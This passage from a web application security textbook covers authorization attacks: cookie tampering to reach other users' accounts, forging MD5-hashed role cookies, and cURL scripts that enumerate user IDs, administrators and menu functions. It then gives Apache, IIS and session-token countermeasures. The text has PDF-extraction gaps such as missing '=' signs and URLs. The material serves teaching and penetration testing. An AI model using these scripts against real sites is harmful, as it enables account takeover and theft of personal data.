however, since it is necessary to communicate with the web site. At this point, we can test the vulnerability of the ShopperID cookie by simply altering its value and replaying it to the server. Because we just created the account, let’s decrement the ShopperID number from 193096346 to 193096345 and see if we can access the information for the account that was created right before ours. Here’s what the client cookie header looks like before the change: Cookie: BIGipServerSecure2.TEAM.WebHosting 1852316332.20480.0000; ShopperID 193096346; And here’s what it looks like after with the new ShopperID value: Cookie: BIGipServerSecure2.TEAM.WebHosting 1852316332.20480.0000; ShopperID 193096345; We send the second, decremented value to the server and check to see whether the same account information is returned. Success! Figure 5-10 shows the account data for an “Emily Sima.” We have just identified a horizontal privilege escalation vulnerability. Furthermore, an attacker can now enumerate every account and grab personal data, or even impersonate any user with her full account privileges. Chapter 5: Attacking Web Authorization 201 Figure 5-10 Success! The information for another account can now be changed. Vertical Privilege Escalation Vertical privilege escalation is the ability to upgrade or gain access to a higher account status or permission level. There are four scenarios that typically result in vertical privilege escalation. • User-modifiable roles The application improperly permits unauthorized users to change their role information. • Hijacked accounts Occurs when an unauthorized user can hijack another privileged user’s account or session. 202 Hacking Exposed Web Applications • Exploiting other security flaws Ability to gain access via other security flaws to an administration area where privileges can be changed. • Insecure admin functions Administrative functions that do not have proper authorization. Let’s take a look at an example of each of these in a real-world scenario. User-modifiable Roles As we’ve seen numerous times in this chapter, many web applications store authorization data such as permission level or role level in user-modifiable locations. We just saw an example of a web shopping application that stores role information in a cookie as a plaintext value. For a similar example with a vertical escalation flavor, consider a fictitious web application with a privileged administrative interface located at .com/siteAdmin/menu.aspx. When we try to access this page normally, the server responds with an HTTP 302 redirect back to the administrative login screen. Further analysis of the HTTP request reveals the following cookies being passed from the client to the server: Cookie: Auth 897ec5aef2914fd153091011a4f0f1ca8e64f98c33a303eddfbb7ea29d217b34; Roles End User; HomePageHits True;ASP.NET SessionId dbii2555qecqfimijxzfaf55 The Roles=End User value is almost a dead giveaway that this application is exposing authorization parameters to client manipulation. To test whether the Roles cookie could be manipulated to execute a vertical privilege escalation attack, we make repeated requests to the application server with different Roles values such as Roles= admin, Roles=root, and Roles=administrator. After several failed attempts, we take a closer look at the naming convention and try Roles=Admin User, which results in access to the administration page. Sadly, our real web application testing experiences are replete with even simpler scenarios where just appending admin= true or admin=1 to the URL has worked. Let’s look at a more challenging example. In the following fictitious web application, we log into an application as a normal user. The cookie that is being sent in each request looks similar to the following: Cookie: ASPSESSIONIDAACAACDA AJBIGAJCKHPMDFLLMKNFLFME; X C910805903&Y 1133214680303; role ee11cbb19052e40b07aac0ca060c23ee We notice the cookie named role= immediately but don’t dwell too long because of the cryptic nature of the value (one of those alphanumeric blobs again!). During subsequent horizontal escalation testing, we create a second account in order to perform differential analysis (as described earlier in this chapter). When we are logged into the second account, the cookie sent with each request looks like the following: Chapter 5: Attacking Web Authorization 203 Cookie: ASPSESSIONIDAACAACDA KPCIGAJCGBODNLNMBIPBOAHI; C 0&T 1133214613838&V 1133214702185; role ee11cbb19052e40b07aac0ca060c23ee Notice anything unusual? The value for the role cookie is the same as it was for the first account we created, indicating that the value is static and not uniquely generated for each user. In fact, when looking at it more closely, it resembles an MD5 hash. A count of the number of characters in the role value yields 32 characters As you might recall from our earlier discussion of session ID fingerprinting, a 32-byte value is one of the canonical ways to represent an MD5 hash (it is the hexadecimal representation of a standard 128-bit MD5 hash). At this point, we figure the application is using a fixed role value for users and then hashing it using the MD5 algorithm. Lions and tigers and crypto, oh my! Slowed down only momentarily, we implement essentially the same privilege escalation attack as before, changing the cookie to role=admin, only using MD5 to first hash the string admin. After hashing the value and inserting it into our request, the cookie we send looks like the following: Cookie: ASPSESSIONIDAACAACDA KPCIGAJCGBODNLNMBIPBOAHI; C 0&T 1133214613838&V 1133214702185; role 21232f297a57a5a743894a0e4a801fc3 Again, the role= value is the word admin hashed with MD5. When we request the main account screen with this cookie, the application sends back a 302 redirect back to the login page—no dice. After several additional manual attempts using strings like administrator and root (the usual suspects) hashed using MD5, we decide to go ahead and write a script to automate this process and read from a dictionary file of common user account names. Once again, if the application returns a response that is not a 302 redirect, then we will have found a correct role. It doesn’t take long; after about five minutes of running this script, we find that Supervisor was a valid role and it presents us with superuser access to the application. Using Hijacked Accounts Horizontal privilege escalation is usually quite easy to take vertical. For example, if the authorization token is implemented using sequential identifiers (as you saw in our previous example of the fictitious web shopping site), then finding a vertical privilege escalation opportunity can be as easy as guessing the lowest account ID that is still valid, which usually belongs to a superuser account, since those accounts are generally created first. Usually, the lower account IDs are the accounts of the developers or administrators of the application and many times those accounts will have higher privileges. We’ll discuss a systematic way to identify administrative accounts using sequential guessing like this in the upcoming section about using cURL to map permissions. Using Other Security Flaws This is just a given. Breaking into the system via another security flaw such as a buffer overflow in a COTS component or SQL injection will usually be enough to be able to change what you need in order to move your account up the ladder. For example, take the omnipresent web statistics page that gives away the location of an administrative 204 Hacking Exposed Web Applications interface located at that doesn’t require any authentication (we talk about common ways to find web statistics pages in Chapter 8). Are you in disbelief? Don’t be—in our combined years of experience pen-testing web applications, this example has occurred much too often. Insecure Admin Functions In our travels, we’ve found many web application administrative functions that aren’t authenticated or authorized properly. For example, consider an application with a POST call to the script “”. Clearly, this is an administrative script based on the folder that it is stored within. Or so the application developers think, since the script is supposedly only accessible from the administrative portions of the site, which require authentication. Of course, potential intruders with a propensity to tinker and a little luck at guessing at directory naming conventions easily find the /admin/utils directory. Some simple tinkering with the updatepdf script indicates that it takes an ID number and a filename as parameters to upload a PDF file to the site. When run as even a normal user, the script will replace any PDFs currently offered to users, as you might imagine befitting of a content management role. Denial of service is written all over this. More devastating, we end up being able to use the updatepdf script to upload our own ASP pages, which then allows us almost full access to the server. Differential Analysis We’ve discussed the concept of differential analysis (as it relates to authorization audits) a couple of times previously in this chapter. Essentially, it involves crawling the target web site while authenticated (or not) using different accounts, noting where parameters such as cookies and/or other authorization/state-tracking data differ. One of our recent consulting experiences highlights the use of this technique. We were contracted to perform an authenticated assessment and were provided two sets of valid credentials by the client: a “standard” application user and an administrative user. We first crawled the site while authenticated as the standard user, logging all pages and forms that were submitted. We then did the same using the administrative credentials. We then sorted both datasets and counted the totals for each type of data submitted. The results are shown in Table 5-8. Data Type Form submissions Cookies Pages Standard User 6 8 62 Admin User 15 8 98 Table 5-8 Differential Analysis Results Produced While Browsing a Web Application While Authenticated as a Standard and Administrative User Chapter 5: Attacking Web Authorization 205 Based on this data, the first obvious attack was to attempt to access the administrative forms and pages using the standard user account. No easy wins here; the pages that we hit appeared to be well protected. We then took a closer look at how standard and admin roles were differentiated via session management. As noted in Table 5-8, both the standard and administrative user received the same number of cookies from the application. This means that the session/ role authorization was possibly associated with one of the cookies. By using the process of cookie elimination shown in the Horizontal Privilege Escalation case study described earlier, we were able to identify a single cookie that appeared to perform the authorization function. Table 5-9 shows the values for both the standard and administrative user. We next analyzed the differences between the standard and administrative cookies. Spend a couple of minutes looking at the cookies in Table 5-9 and see if what you come up with matches our observations listed here: • The cookie value is separated into segments using periods. • The first, third, and fourth segments are the same length and are all numeric. • The second segment could be an MD5 hash (it’s 32-bytes long; see the earlier section entitled “Analyzing Session Tokens”). • Each segment is the same length for each user. • The first three numbers in the first segment for each user are the same. Although we may have gleaned the algorithm used to produce the second segment, this cursory analysis hadn’t really revealed anything useful, so we probed further. We did this by systematically changing values in the cookie and resubmitting it to the application. We began by changing values in the last segment of the cookie and then worked our way to the front. Table 5-10 shows the results of some of our testing. We interpreted the data in Table 5-10 to mean that the last segment had little to do with authorization. We repeated this process for each segment in the cookie, and when we were done, we were surprised to find out that only the first five characters in the cookie appeared to be relevant to authorization state. Looking back at Table 5-9, the only difference between the standard and admin user accounts—within the first five characters of the cookie— was in the fifth character position: the admin user had a 0 and the standard user had a 1. User Type Standard Admin Cookie Value jonafid 833219244.213a72e5767c1c7a6860e199e2f2bfaa.0092.783823921 jonafid 833208193.dd5d520617fb26aeb18b8570324c0fcc.0092.836100218 Table 5-9 Cookie Values for Both Standard and Admin User Types 206 Hacking Exposed Web Applications Changed Value Add a character (9) Change last character from 1 to 9 Change the penultimate character Change all characters to 9s Result Application error: “Not logged in.” No visible changes to login state Same as previous Same as previous Table 5-10 Input Validation Checking Results for the Last Segment of the “jonafid” Cookie With a bit more input manipulation, we subsequently discovered that the fifth position contained serially incrementing account numbers, and that by changing these, we were able to easily hijack other users’ sessions. When Encryption Fails As security awareness increases, more developers are using security technologies to protect their applications, systems, and users from compromise by malicious parties. However, just because developers are using a security technology, does not mean they are using it correctly. Take encryption, for example. The primary reason to use encryption is to protect the confidentiality of the data that is being encrypted. If there is no real need to encrypt the data, then encryption should not be used because it can degrade performance and it complicates application design. As an example of how encryption can be used improperly to provide a false sense of security, consider an application that has a user profile page accessible through a link similar to the following: http://hackx/userprofile/userprofile.aspx?uid ZauX%2f%2fBrHY8%3d Notice the uid value in the above URL. Parameters called uid almost invariably represent “user IDs” and contain unique values corresponding to individual users in an application. Commonly, these values are sequential positive integers that map directly to the primary key values used in the backend database (this is not the suggested way to do this, just an extremely common and error-prone way). In the case of the above URL, the value is not an integer, but a complex string. Although it is not clear what this value might actually be, the reader should by now be clued in to the possibility that the value is base64-encoded due to the URL encoded %3d (=) at the end. Subsequent decoding of the value results in a seemingly random sequence of 8 bytes, indicating that the value is likely encrypted. Attacking this value using some of the techniques discussed in this chapter may or may not be profitable; given its 8-byte length, random bit-flipping and brute-force Chapter 5: Attacking Web Authorization 207 cracking are likely to drain significant time, without necessarily producing results. What if there is an easier way? The key to attacking this functionality is to realize that the same encryption scheme used for protecting other objects in the system (such as unique product and category IDs) is also used for uid values. For example, if you assume that the value underlying the encrypted uid value is an integer that corresponds to the primary key of a user row in a backend database table, then it would make sense for other encrypted object IDs to also be primary key values in their respective tables. That means that we might be able to use an encrypted product ID value as a uid value in a request to the application and gain access to the record for another user. To test whether such an attack will work, all that is required is to collect a number of encrypted product and category IDs and use those as the uid value in requests to the user profile page, userprofile.aspx. After some trial and error with this method, we hit pay dirt and succeed in accessing another user’s profile containing all his juicy personal details. Of course, the root cause of this vulnerability is insecure authorization controls governing access to the user profile page and has nothing to do with the strength of the encryption algorithm used. Ultimately, access to the profiles of other users has to be secured by checking the identity and role of the requesting user with more than just the simple uid value in the query string. In a secure application, the uid of the current user will be tightly associated with the currently authenticated session and attempts to override that relationship by supplying a uid value in application requests will be ignored. Using cURL to Map Permissions cURL is a fantastic tool for automating tests. For example, suppose you are auditing an application that doles out user ID numbers sequentially. You have identified the session tokens necessary for a user to view his profile information: uid (a numeric user ID) and sessid (the session ID). The URL request is a GET command that passes these arguments: menu=4 (the number that indicates the view profile menu), userID=uid (the user ID is passed in the cookie and in the URL), profile=uid (the profile to view, assumed to be the user’s own), and r=874bace2 (a random number assigned to the session when the user first logs in). So the complete request would look like this: GET /secure/display.php?menu 4&userID 24601&profile 24601&r 874bace2 Cookie: uid 24601; sessid 99834948209 We have determined that it is possible to change the profile and userID parameters on the URL in order to view someone else’s profile (including the ability to change the e-mail address to which password reminders are sent). Now, we know that the user ID numbers are generated sequentially, but we don’t know what user IDs belong to the application administrators. In other words, we need to determine which user IDs can view an arbitrary profile. A little bit of manual testing reveals that if we use an incorrect combination of profile and userID values, then the application returns, “You are not 208 Hacking Exposed Web Applications authorized to view this page,” and a successful request returns, “Membership profile for… ”; both return a 200 HTTP code. We’ll automate this check with two cURL scripts. The first cURL script is used to determine what other user IDs can view our profile. If another user ID can view our profile, then we assume it belongs to an administrator. The script tests the first 100,000 user ID numbers: #!/bin/sh USERID 1 while [ $USERID -le 100000 ] ; do echo –e "$USERID ******\n" >\> results.txt `curl –v –G \ -H 'Cookie: uid $USERID; sessid 99834948209' \ -d 'menu 4' \ -d 'userID $USERID' \ -d 'profile 24601' \ -d 'r 874bace2' \ --url results.txt` echo –e "*********\n\n" >\> results.txt UserID `expr $USERID + 1` done exit After the script executes, we still need to manually search the results.txt file for successes, but this is as simple as running a grep for “Membership profile for” against the file. In this scenario, user ID numbers 1001, 19293, and 43000 are able to view our profile—we’ve found three administrators! Next, we’ll use the second script to enumerate all active user IDs by sequentially checking profiles. This time we leave the userID value static and increment the profile value. We’ll use the user ID of 19293 for the administrator: #!/bin/sh PROFILE 1 while [ $PROFILE -le 100000 ] ; do echo –e "$PROFILE ******\n" >\> results.txt `curl –v –G \ -H 'Cookie: uid 19293; sessid 99834948209' \ -d 'menu 4' \ -d 'userID 19293' \ -d 'profile $PROFILE' \ -d 'r 874bace2' \ --url results.txt` echo –e "*********\n\n" >\> results.txt UserID `expr $PROFILE + 1` done exit Chapter 5: Attacking Web Authorization 209 Once this script has finished running, we will have enumerated the profile information for every active user in the application. After taking another look at the URL’s query string parameters (menu=4&userID= 24601&profile =24601&r=874bace2), a third attack comes to mind. So far we’ve accessed the application as a low-privilege user. That is, our user ID number, 24601, has access to a limited number of menu options. On the other hand, it is likely that the administrator who has user ID number 19293 has more menu options available. We can’t log in as the administrator because we don’t have that user’s password. We can impersonate the administrator, but we’ve only been presented with portions of the application intended for low-privilege users. The third attack is simple. We’ll modify the cURL script and enumerate the menu values for the application. Since we don’t know what the results will be, we’ll create the script so it accepts a menu number from the command line and prints the server’s response to the screen: #!/bin/sh # guess menu options with curl: curl –v –G \ -H 'Cookie: uid 19293; sessid 99834948209' \ -d 'menu $1' \ -d 'userID 19293' \ -d 'r 874bace2' \ --url Here’s how we would execute the script: $ ./ 4 $ ./ 7 $ ./ 8 $ ./ 32 Table 5-11 shows the result of the manual tests. Menu Number 1–3 4 8 16 32 Function Display home page View the user’s profile Change the user’s password Search for a user Delete a user Table 5-11 Results of Manual Parameter Injection to the “menu” Query String Parameter 210 Hacking Exposed Web Applications We skipped a few numbers for this example, but it looks like each power of two (4, 8, 16, 32) returns a different menu. This makes sense in a way. The application could be using an 8-bit bitmask to pull up a particular menu. For example, the profile menu appears in binary as 00000100 (4) and the delete user appears as 00100000 (32). A bitmask is merely one method of referencing data. There are two points to this example. One, examine all of an application’s parameters in order to test the full measure of their functionality. Two, look for trends within the application. A trend could be a naming convention or a numeric progression, as we’ve shown here. There’s a final attack that we haven’t tried yet—enumerating sessid values. These cURL scripts can be easily modified to enumerate valid sessid values as well; we’ll leave this as an exercise for the reader. Before we finish talking about cURL, let’s examine why this attack worked: • Poor session handling The application tracked the sessid cookie value and the r value in the URL; however, the application did not correlate either value with the user ID number. In other words, once we authenticated to the application, all we needed to remain authenticated were the sessid and r values. The uid and userID values were used to check authorization, whether or not the account could access a particular profile. By not coordinating the authorization tokens (uid, userID, sessid, r), we were able to impersonate other users and gain privileged access. If the application had checked that the uid value matched the sessid value from when the session was first established, then the application would have stopped the attack because the impersonation attempt used the wrong sessid for the corresponding uid. • No forced session timeout The application did not expire the session token (sessid) after six hours. This is a tricky point to bring up, because technically the session was active the entire time as it enumerated 100,000 users. However, applications can still enforce absolute timeouts on a session, such as one hour, and request the user to re-authenticate. Re-authenticating would not have stopped the attack, but in a situation where the session ID was hijacked or stolen it would have helped to mitigate its impact. This protects users in shared environments such as university computer labs from attackers taking their session, and also protects against session fixation attacks where the attacker attempts to fix the session expiry unrealistically far into the future. AUTHORIZATION BEST PRACTICES We’ve covered a lot of web app authorization attacks. Now, how do we mitigate all of those techniques? In this chapter, we basically divided up web app authorization attacks into two camps: server-side ACL attacks and client-side token attacks. Thus, our discussion of countermeasures is divided into two parts based on those categories. Chapter 5: Attacking Web Authorization 211 Before we begin, some general authz best practices should be enumerated. As we’ve seen throughout this chapter, authz exploits are often enabled or exaggerated by web server vulnerabilities (see Chapters 3 and 10) and input validation (Chapter 6). As such, applying countermeasures to those potential vulnerabilities has the fortunate side effect of blocking some authorization attacks as well. Another best practice is to define clear, consistent access policies for your application. For example, design the user database to contain roles for the application’s functions. Some roles are read, create, modify, delete, and access. A user’s session information should explicitly define which roles can be used. The role table looks like a matrix, with users defined in each row and their potential roles defined in each column. Web ACL Best Practices As we noted, the lowest common denominator of web app authorization is provided by ACLs, particularly filesystem ACLs (although we will cover ACLs on other objects like HTTP methods in our upcoming discussion). In this section, we’ll describe best practices for web ACL configuration and then discuss how to configure ACLs on two popular web platforms, Apache and IIS. Apache Authorization The Apache web server uses two different directives to control user access to specific URLs. The Directory directive is used when access control is based on file paths. For example, the following set of directives limits access to the /admin URL. Only valid users who are also in the admin group can access this directory. Notice that the password and group files are not stored within the web document root. AuthType Digest AuthName "Admin Interface" AuthUserFile /etc/apache/passwd/users AuthGroupFile /etc/apache/passwd/groups Require group admin You can also limit access to certain HTTP commands. For example, HTTP and WebDAV support several commands: GET, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, and UNLOCK. The WebDAV commands provide a method for remote administration of a web site’s content. Even if you allow WebDAV to certain directories, use the Limit directives to control those commands. For example, only permit GET and POST requests to user pages: Options -MultiViews -Indexes -Includes Limit GET POST Order allow,deny 212 Hacking Exposed Web Applications Allow from all /Limit Thus, users can only use the GET and POST commands when requesting pages in the /htdocs directory, the web root. The HEAD command is assumed with GET. Now, if you wish to enable the WebDAV options for a particular directory, you could set the following: AuthType Digest AuthName "Author Site" AuthUserFile /etc/apache/passwd/users AuthGroupFile /etc/apache/passwd/groups Limit GET POST PUT CONNECT PROPFIND COPY LOCK UNLOCK Require group author /Limit We haven’t permitted every WebDAV option, but this should be enough for users in the author group who wish to access this portion of the web application. The Location directive is used when access control is based on the URL. It does not call upon a specific file location: AuthType Digest AuthName "My Application" AuthUserFile /etc/apache/passwd/users AuthGroupFile /etc/apache/passwd/groups Require valid-user Just about any of the directives that are permitted in tags are valid for tags. IIS Authorization Starting with IIS7, Microsoft has unified configuration of IIS file authorization settings under the standard Windows filesystem permission interfaces. Also, they’ve unified standard access under the IIS_IUSRS group, which is now the default identity for applications running in any application pool to access resources. To configure access control for web directories and files under IIS, open the IIS Manager tool (Start | Run | inetmgr), navigate to the site, application, or virtual directory that you want to secure, right-click and select Edit Permissions…. On IIS7, this displays the interface shown in Figure 5-11, which illustrates the default security applied to the built-in Default Web Site for the IIS_IUSRS group. Chapter 5: Attacking Web Authorization 213 Avoid permitting web users to write content. If you do, it is even more important not to give execute or script permissions to user-writeable directories, in order to prevent upload and execution of malicious code. Besides file authorization, Microsoft also supports URL authorization via web.config files, under the system.web/authorization section (in Integrated Pipeline mode, IIS7 uses the system.webServer/authorization section). This mechanism is very similar to the Apache authorization mechanisms described previously, using structured text strings to define what identities have what level of access to resources. See “References & Further Reading” at the end of this chapter for pointers to tutorials on configuring authorization using web.config in various scenarios, including some subtle differences between IIS7 and ASP.NET URL Authorization behavior. Figure 5-11 Configuring IIS7 directory security 214 Hacking Exposed Web Applications IP Address Authorization Although we don’t normally recommend it, IIS also permits IP address–based access control. Configuration is accessible via the “Edit Bindings…” feature of a given site. This might be useful in scenarios where only certain addresses, subnets, or DNS names are allowed access to an administration directory, for example. It’s highly discouraged for Internet-facing applications, since sequential requests are not guaranteed to come from the same IP address, and multiple users can come from the same IP address (think corporate networks). Web Authorization/Session Token Security As we’ve seen in this chapter, authorization/session security can be a complex topic. Here is a synopsis of authorization/session management techniques best practices: • Use SSL. Any traffic that contains sensitive information should be encrypted to prevent sniffing attacks. • Mark cookies using the Secure parameter of the Set-Cookie response header, per RFC 2109. • Don’t roll your own authz. Off-the-shelf authorization features, such as those that come with web application platforms like ASP.NET and PHP that we will discuss shortly, are likely to have received more scrutiny in real-world environments than anything developed from scratch by even the largest web app development shops. Leave the security stuff to the professionals and keep focused on your core business. You’ll suffer fewer vulnerabilities for it; trust us. • Don’t include personally sensitive data in the token. Not only does this lead to session hijacking (since this data is often not really secret—ever tried finding someone’s home address on Google?), but if it’s disclosed, the user is out more than just some randomly generated session ID. The attacker may have stolen their government ID, secret password, or whatever other information was used to populate the token. • Regenerate session IDs upon privilege changes. Most web applications assign a session ID upon the first request for a URL, even for anonymous users. If the user logs in, then the application should create and assign a new session ID to the user. This not only represents that the user has authenticated, but it reduces the chances of eavesdropping attacks if the initial access to the application wasn’t conducted over SSL. It also mitigates against session fixation attacks discussed earlier in the chapter, where an attacker goes to a site and gets a session ID, then e-mails it to the victim and allows them to log in using the ID that the attacker already knows. • Enforce session time limits to close down the window for replay attacks. Invalidate state information and session IDs after a certain period of inactivity (for example, 10 minutes) or a set period of time (perhaps 30 minutes). In addition to relative per-session expiry, we recommend the application set global absolute limits on session lengths to prevent attacks that attempt to fix session IDs far Chapter 5: Attacking Web Authorization 215 into the future. And always remember: the server should invalidate the ID or token information; it should not rely on the client to do so. This protects the application from session replay attacks. • Enforce concurrent login limits. Disallow users from having multiple, concurrent authenticated sessions to the application. This could prevent malicious users from hijacking or guessing valid session IDs. • Perform strict input validation. Cookie names and values, just like POST, GET, and other HTTP header values, are under the complete control of the user and can be modified to contain data that the application does not expect. Therefore, strict input validation of cookie values must be performed at that application server to ensure that attackers cannot maliciously modify the cookie data to exploit security vulnerabilities. To Be or To Impersonate One of the most important questions when it comes to web app authorization is this: In what security (account) context will a given request execute? The answer to this question will almost always define what resources the request can access (a.k.a. authorization). Here’s some brief background to shed some light on this often misunderstood concept. As we discussed in Chapter 1, web applications are client-server oriented. There are essentially two options for servers when it comes to honoring client requests: • Perform the request using the server’s own identity (in the case of web applications, this is the web server/daemon). • Perform the request by impersonating the client (or some other identity with similar privileges). In software terms, impersonation means the server process spawns a thread and gives it the identity of the client (i.e., it attaches the client’s authorization token to the new thread). This thread can now access local server resources on the user’s behalf just as in the simple authz model presented at the beginning of this chapter. The impersonated thread may also be able to access resources remote to the first server; Microsoft terms this delegation and requires a special configuration and a higher level of privilege to perform this. Web applications use both options just described, depending first upon the make and model of the web daemon and second upon whether the request is for a filesystem object or whether it’s to launch a server-side executable (such as a CGI or ISAPI application). For example, Microsoft’s IIS prior to version 6 always impersonated access to filesystem objects (whether as a fixed account like IUSR_machinename, or as the authenticated account specified by the client). For executables, it does not impersonate by default but can be configured to do so. The default configuration of ASP.NET applications on IIS6 and later don’t impersonate—all requests execute in the context of the Network Service 216 Hacking Exposed Web Applications account; impersonation for ASP.NET applications can be configured via machine.config or web.config under system.web/identity impersonate. Apache does not impersonate requests for filesystem objects or executables, but rather executes everything within the security context of the web daemon process (although there are add-on modules that allow it to approximate impersonation of executables via setuid/setgid operations). Because web app authorization is mediated almost entirely by the web server daemon, be especially wary of vulnerabilities in web daemons that bypass the standard authorization mechanism, such as the IIS Unicode and Double Decode issues discovered in 2001. In any case, it should be evident that the user account that runs the web server, servlet engine, database, or other components of the application should have the least possible privileges. We’ve included links to several articles in the “References & Further Reading” section at the end of this chapter that describe the details of which accounts are used in default scenarios on IIS and Apache and how to configure them. ASP.NET Authorization As with many Microsoft products, IIS is but one layer in a stack of technology offerings that can be composed into complex applications. For development efforts that decide to adopt Microsoft’s IIS web server product, adopting their web development framework—Active Server pages (ASP), now called ASP.NET since its integration with Microsoft’s broader .NET programming ecosystem—is usually practical. ASP.NET provides some very compelling authorization options, the details of which are too voluminous to go into here. We recommend checking out the “References & Further Reading” section at the end of this chapter to understand the authorization options provided by ASP.NET. One thing we would like to highlight for those who do implement ASP.NET: if you choose to specify authn/authz credentials in the elements of your web .config files, you should encrypt them using either the Aspnet_regiis.exe tool (for ASP .NET version 2) or the Aspnet_setreg.exe tool (on ASP.NET version 1.1). In-depth descriptions of how to use these tools can be found in “References & Further Reading” at the end of this chapter. Security Logs Another access control countermeasure that often gets overlooked is security logging. The web application’s platform should already be generating logs for the operating system and web server. Unfortunately, these logs can be grossly inadequate for identifying malicious activity or re-creating a suspect event. Many additional events affect the user’s account and should be tracked, especially when dealing with financial applications: • Profile changes Record changes to significant personal information such as phone number, address, credit card information, and e-mail address. • Password changes Record any time the user’s password is changed. Chapter 5: Attacking Web Authorization 217 Optionally, notify the user at their last known good e-mail address. (Yahoo! does this, for example.) • Modify other user Record any time an administrator changes someone else’s profile or password information. This could also be triggered when other users, such as help desk employees, update other users’ information. Record the account that performed the change and the account that was changed. • Add/delete user Record any time users are added to or removed from the system. The application should log as much detail as possible. Of course, there must be a balance between the amount and type of information logged. At a minimum, information that identifies the user who originated the request should be logged. This information includes the source IP address, username, and other identification tokens, date, and time the event occurred. Logging the actual values that were changed might not be a good idea. Logs should already be treated with a high degree of security in order to maintain their integrity, but if the logs contain Social Security numbers, credit card numbers, and other highly sensitive personal or corporate information, then they could be at risk of compromise from internal and external threats. In some cases, storing personally identifiable information (PII) such as addresses, financial data, and health information in logs may violate local or national laws, or be a violation of industry regulations. Whenever storing this type of data in log files, care should be taken to study and understand what can and cannot be stored, how long the data can be stored, and what level of protection is required. SUMMARY In this chapter, you saw that the typical web application authorization model is based heavily on server-side ACLs and authorization/session tokens (either off-the-shelf or custom-developed) that are vulnerable to several common attacks. Poorly implemented ACLs and tokens are easily defeated using common techniques to bypass, replay, spoof, fix, or otherwise manipulate authorization controls to masquerade as other users, including administrators. We also described several case studies that illustrated how such techniques can be combined to devastate web app authorization at multiple levels. Finally, we discussed the toolset available to web administrators and developers to counteract many of the basic attack techniques described in this chapter, as well as some broader “defense-in-depth” strategies that can help harden the overall security posture of a typical web application. 218 Hacking Exposed Web Applications REFERENCES & FURTHER READING Reference General References “Brute Force Exploitation of Web Application Session IDs” by David Endler “Session Fixation Vulnerability in Web-based Applications” by ACROS Security Role-Based Access Control PHP Security Quip iPhone App Security Flaw Apache Authn/Authz Resources Apache 2.2 Authentication, Authorization, and Access Control Apache suEXEC, approximates Impersonation IIS Authn/Authz Resources Changes Between IIS 6.0 and IIS 7 Security Understanding IIS 7.0 URL Authorization “IIS Authentication” from MSDN “How IIS Authenticates Browser Clients” “How To Configure IIS Web Site Authentication in Windows Server 2003” “NTLM Authentication Scheme for HTTP” “How To: Use Windows Authentication in ASP.NET 2.0” (good technical coverage of authz) Link security.php -security-flaw-in-popular-iphone-app-leads-to -privacy-leak/5935 howto/auth .html -between-iis-60-and-iis-7-security/ understanding-iis-70-url-authorization/ aa292114(VS.71).aspx ronald/ ntlm.html ms998358 Chapter 5: Attacking Web Authorization 219 Reference “How To: Protect Forms Authentication in ASP.NET 2.0” “How To: Encrypt Configuration Sections in ASP.NET 2.0 Using DPAPI” “How To: Encrypt Configuration Sections in ASP.NET 2.0 Using RSA” Microsoft Authorization Manager (AzMan) whitepaper Understanding ASP.NET View State Tools Offline Explorer Pro WebScarab Burp Suite HP WebInspect Toolkit Cookies RFC 2109, “HTTP State Management Mechanism” (The Cookies RFC) Do’s and Don’ts of Client Authentication on the Web CookieSpy Link ff648341.aspx ms998280 ms998283 cc780256(WS.10).aspx ms972976.aspx Category:OWASP_WebScarab_Project display/main/hpms_content.jsp?zn=bto&cp=1-11 -201-200^9570_4000_100__ webauth:sec10 .pdf cookiespy.aspx 6 InpuAttItnajcekcstion 222 Hacking Exposed Web Applications Input validation serves as a first line of defense for a web application. Many vulnerabilities like SQL injection, HTML injection (and its subset of cross-site scripting), and verbose error messages are predicated on the ability of an attacker to inject some type of unexpected or malicious input to the application. When properly implemented, input validation routines ensure that the data is in a format, type, length, and range that is useful to the application. Without these checks, the confidentiality, integrity, and availability of an application and its information may be at risk. Imagine a ZIP code field for an application’s shipping address form. Without a valid ZIP code, the postal service will not be able to deliver the mail quickly. We know that a ZIP code should consist of only digits. We also know that it should be at least 5 digits in length. Optionally, there can be 5 digits, a hyphen, and an additional 4 digits (ZIP plus 4), making a total of 10 characters So the first validation routine will be a length check. Does the input contain 5 or 10 characters? The second check will be for data type. Does the input contain any characters that are not numbers? If it is 5 characters in length, then it should be only digits. If it is 10 characters, there should be 9 numbers and a hyphen between the 5th and 6th characters. Validation of this ZIP format would involve ensuring no other characters besides digits exist—with the exception of a hyphen in position 6. To check the range of the input, we would verify that each digit was 0 to 9. Since we’re working with a finite set of codes, we could add another check to query the list of known valid ZIP codes from or an offline copy of the list such as a text file or database. This check ensures the input is in the valid set of ZIP codes and acts as an even stronger form of input validation. For example, 12345 is a valid ZIP code belonging to General Electric in New York. They often get mail addressed to Santa Claus, North Pole 12345. However, 00000 is not a valid ZIP code; even though it passes the type, format, and length checks, it would take this additional check to determine its validity. This chapter focuses on the dangers inherent in placing trust in user-supplied data and the ways an application can be attacked if it does not properly restrict the type of data it expects. Data validation can be complex, but it’s a major basis of application security. Application programmers must exercise a little prescience to figure out all of the possible values that a user might enter into a form field. We just discussed how to perform the type, length, format, and range checks for a ZIP code. These tests can be programmed in JavaScript, placed in the HTML page, and served over SSL. The JavaScript solution sounds simple enough at first glance, but it is also one of the biggest mistakes made by developers. As you will see in the upcoming sections, client-side input validation routines can be bypassed and SSL only preserves the confidentiality of a web transaction. In other words, you can’t trust the web browser to perform the security checks you expect, and encrypting the connection (via SSL) has no bearing on the content of the data submitted to the application. EXPECT THE UNEXPECTED One of the biggest failures of input validation is writing the routines in JavaScript and placing them in the browser. At first, it may seem desirable to use any client-side scripting Chapter 6: Input Injection Attacks 223 language for validation routines because the processing does not have to be performed on the server. Client-side filters are simple to implement and are widely supported among web browsers (although individual browser quirks still lead to developer headaches). Most importantly, they move a lot of processing from the web server to the end user’s system. This is really a Pyrrhic victory for the application. The web browser is an untrusted, uncontrollable environment, because all data coming from and going to the web browser can be modified in transit irregardless of input validation routines. If performance is an issue, it is much cheaper to buy the hardware for another web server to handle the additional server-side input validation processing than to wait for a malicious user to compromise the application with a simple %0a in a parameter. Attacks against input validation routines can target different aspects of the application. Understanding how an attacker might exploit an inadequate validation routine is important. The threats go well beyond mere “garbage data” errors. • Data storage This includes characters used in SQL injection attacks. These characters can be used to rewrite the database query so it performs a custom action for the attacker. An error might reveal information as simple as the programming language used in the application or as detailed as a raw SQL query sent from the application to its database. • Other users This includes cross-site scripting and other attacks related to “phishing.” The attacker might submit data that rewrites the HTML to steal information from an unsuspecting user or mislead that user into divulging sensitive information. • Web server’s 